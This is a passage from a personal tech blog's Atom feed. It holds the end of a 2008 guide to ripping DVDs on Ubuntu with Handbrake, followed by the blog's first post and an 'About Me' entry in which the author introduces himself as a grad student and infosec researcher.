&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-select-source1.png"&gt;&lt;img alt="Handbrake - Select Source" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-select-source1.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Check to make sure that the correct title was selected; there
should be a preview at the bottom. It seems to just select the
longest title available. If it is not the one you want, simply select
what title/chapters you wish to rip to your file. If you want to rip
something such as a TV show season (meaning you want separate files for
each episode), you will need to add each title to the queue individually,
AFAIK.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-5.png"&gt;&lt;img alt="Handbrake Title Selection" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-5.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Choose where you want to save this file. Then, select the file container
you want. I personally would recommend the &lt;a class="reference external" href="http://www.matroska.org/"&gt;MKV format&lt;/a&gt;, as an open
source and completely free container, but depending on what you are
using your rip for you may not be able to do this. Regardless, there are
plenty of options for your container.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-2.png"&gt;&lt;img alt="screenshot-handbrake-2" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-2.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;All that's left now is to change the video/audio encoding settings to
your liking. You can essentially configure this as much or as little as
you'd like to. If you want subtitles included, make sure that the proper
ones are selected in the Audio/Subtitles tab. For me, making rips of
DVDs is perfectly managed by the High Profile -&amp;gt; Film profile, with a
few small tweaks. One thing I would recommend doing is setting your
bitrate/final file size in the video tab. I usually go for a 1.4GB file
when using h.264 + AC3 5.1, but again, I go for high quality; you would
be perfectly fine going with something lower.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-3.png"&gt;&lt;img alt="Handbrake Bitrate Selection" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-3.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Once you've configured everything to your liking, just click Start. If
you want to add other movies, click Add To Queue, but do remember that
you can only have one DVD in your drive at a time.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-4.png"&gt;&lt;img alt="Handbrake - Start Encoding" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-4.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I hope this was helpful to someone out there struggling with encoding
DVDs on Linux. If there are any errors in the above post, or anything
you would like me to expand upon, feel free to let me know; I would be
glad to help out anyone who's having trouble. If you are having
problems, &lt;a class="reference external" href="http://ubuntuforums.org/showthread.php?t=992997"&gt;this forum discussion&lt;/a&gt; (ubuntuforums.org) might be of help
as well.&lt;/p&gt;
&lt;p&gt;UPDATE: I have now also posted a guide on &lt;a class="reference external" href="https://spareclockcycles.org/2009/04/14/howto-restoring-dvd-backups-on-ubuntu-with-devede/"&gt;how to restore these rips to
DVDs&lt;/a&gt;. Hope it's useful.&lt;/p&gt;
</summary><category term="dvds"></category><category term="encoding"></category><category term="handbrake"></category><category term="linux"></category><category term="ripping"></category><category term="Ubuntu"></category></entry><entry><title>And So It Begins...</title><link href="https://spareclockcycles.org/2008/12/06/and-so-it-begins.html" rel="alternate"></link><updated>2008-12-06T10:12:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2008-12-06:2008/12/06/and-so-it-begins.html</id><summary type="html">&lt;p&gt;Well, it's 4 in the morning, and here I am starting a blog. Really
should get to bed soon, but I feel the (not so) strange urge to start
writing. So here I am. I've wanted to start a blog for a while now, but
I've never really found the time or energy to do so. Guess there's
no better time than right now.&lt;/p&gt;
&lt;p&gt;I'm mainly creating this blog as a place to voice my completely
insignificant thoughts on what matters to me. I considered listing them
here, but a.) I don't want to pigeonhole my focus, and b.) it's hard to
break all of those things up into categories, as they overlap pretty
often. So for now, we'll just say this is a technology blog with a
smattering of everything else mixed in, and see what comes from there.&lt;/p&gt;
&lt;p&gt;Well, they say a journey of a thousand miles begins with a
single step. I think I will make mine towards my bed. Maybe next time I
will post with something of a little more substance. Adios.&lt;/p&gt;
</summary><category term="beginning"></category><category term="n00b"></category></entry><entry><title>About Me (And This Blog)</title><link href="https://spareclockcycles.org/2008/12/06/about-me-and-this-blog.html" rel="alternate"></link><updated>2008-12-06T09:56:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2008-12-06:2008/12/06/about-me-and-this-blog.html</id><summary type="html">&lt;p&gt;Grad student by day, infosec researcher by night. I spend most of my
time playing with whatever shiny new technology has most recently
caught my eye, which tends to keep me pretty constantly occupied. This
blog exists as a way for me to organize the rather random projects I
find myself working on from day to day, as well as interesting things I
find along the way. Most of it is security related, but I still post on
other things from time to time when I feel the need. I hope it's also
useful to other people out there interested in similar things, and I
definitely welcome any and all feedback.&lt;/p&gt;
&lt;p&gt;If you really want to read every inane thing I have ever decided to
think, you can follow me on Twitter: &lt;a class="reference external" href="http://twitter.com/_supernothing"&gt;http://twitter.com/_supernothing&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you need a more useful way to contact me, hit me up at supernothing
4T spareclockcycles D0T org, either by email or Google chat. You can
also find me on Freenode from time to time as supernothing. I should get
back to you pretty quickly.&lt;/p&gt;
&lt;blockquote&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;&amp;quot;Earthlings went on being friendly, when they should have been thinking instead. And even when they built computers to do some thinking for them, they designed them not so much for wisdom as for friendliness. So they were doomed.&amp;quot;  --Kurt Vonnegut, &lt;em&gt;Breakfast of Champions&lt;/em&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
</summary></entry></feed>